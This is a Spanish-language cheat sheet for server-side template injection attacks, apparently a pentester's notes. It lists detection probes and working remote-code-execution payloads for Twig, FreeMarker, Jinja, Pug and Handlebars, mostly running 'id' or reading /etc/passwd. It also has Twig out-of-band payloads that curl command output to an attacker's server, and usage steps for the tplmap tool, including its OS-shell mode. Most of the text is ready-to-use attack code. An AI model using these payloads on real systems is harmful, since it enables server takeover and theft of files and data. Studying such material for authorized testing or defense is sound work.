# Server-side template injection (SSTI) ## Template engines | Template engine | Lenguaje | Server / client side | | ----------------- | ----------------- | ------------------------ | | Twig | PHP | Server side | | Apache FreeMarker | Java (usualmente) | Server side | | Jinja | Python | Server side | | Pug / Jade | JavaScript | Server side (usualmente) | | Handlebars | JavaScript | Server and client side | | Mustache | Varios | Server and client side | ## Identificación general de SSTI ```sh # payloads general {1234*2} {1234+1234} %{1234*2} %{1234+1234} <%= 1234*2 %> <%= 1234+1234 %> ${1234*2} ${1234+1234} {{1234*2}} {{1234+1234}} #{1234*2} #{1234+1234} @{1234*2} @{1234+1234} @(1234*2) @(1234+1234) # identificación 2468 2,468 2.468 <2468> # payloads error ${{<%[%'"}}%\. <%= foobar %> ``` * * [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection). ### Arbol de decisión para la identificación del motor de plantilla

Arbol de decisión para la identificación del motor de plantilla

## Twig Identificación general. ```twig {{1234*'2'}} 2468 {{-2468-}} 2468 ``` Payloads generales. ```twig {{1234*2}} {{1234*'2'}} {{1234+1234}} {{1234+'1234'}} {{-2468-}} {{[0]|reduce('system','id')}} {{[0]|reduce('passthru','id')}} {{[0]|reduce('system','cat /etc/passwd')}} {{[0]|reduce('passthru','cat /etc/passwd')}} {{['id']|filter('system')}} {{['id']|filter('passthru')}} {{['cat /etc/passwd']|filter('system')}} {{['cat /etc/passwd']|filter('passthru')}} {{['id']|map('system')|join}} {{['id']|map('passthru')}} {{['cat /etc/passwd']|map('system')|join}} {{['cat /etc/passwd']|map('passthru')|join}} ``` ### Out-of-band (OOB) Habilitación de servidor HTTP. ```sh python -m SimpleHTTPServer python3 -m http.server ``` Identificación de SSTI out of bound (blind). ```twig {{[0]|reduce('system','curl http:///oob')}} ``` Ejecución de comandos. ```twig {% set output %} {{[0]|reduce('system','id')}} {% endset %} {% set exfil = output| url_encode %} {{[0]|reduce('system','curl http:///?oob=' ~ exfil)}} ``` Lectura de archivos. ```twig {% set output %} {{[0]|reduce('system','cat /etc/passwd')}} {% endset %} {% set exfil = output| url_encode %} {{[0]|reduce('system','curl http:///?oob=' ~ exfil)}} ``` ## Apache FreeMarker Identificación general. ```ftl ${1234*2} 2,468 2.468 ``` ```ftl ${1234*2} ${1234+1234} ${"freemarker.template.utility.Execute"?new()("id")} ${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")} ``` ## Jinja Identificación general. ```django {{"2468"*3}} 246824682468 ``` ```django {{1234*2}} {{1234+1234}} {{config|pprint}} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("id").read()}}{%endif%}{% endfor %} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("cat /etc/passwd").read()}}{%endif%}{% endfor %} ``` ## Pug / Jade Identificación general. ```pug #{1234*"2"} <2468> ``` ```pug #{1234*2} #{1234*'2'} #{1234+1234} #{global.process.mainModule.require('child_process').spawnSync('id').stdout} #{global.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout} ``` ## Handlebars ```handlebars {{#each (readdir "/etc")}} {{this}} {{/each}} {{read "/etc/passwd"}} ``` ## Herramientas automatizadas ### Tplmap * Instalación. ```sh git clone https://github.com/epinna/tplmap.git cd tplmap pip install virtualenv virtualenv -p python2 virtualenv-tplmap source virtualenv-tplmap/bin/activate pip install -r requirements.txt ./tplmap.py ``` Utilización de herramienta. ```sh # Método GET ./tplmap.py -u "http:///index.php?=value*" # Método POST ./tplmap.py -u "http://" -d ="value*" # Ejecución de comandos --os-cmd= # Shell interactiva --os-shell ```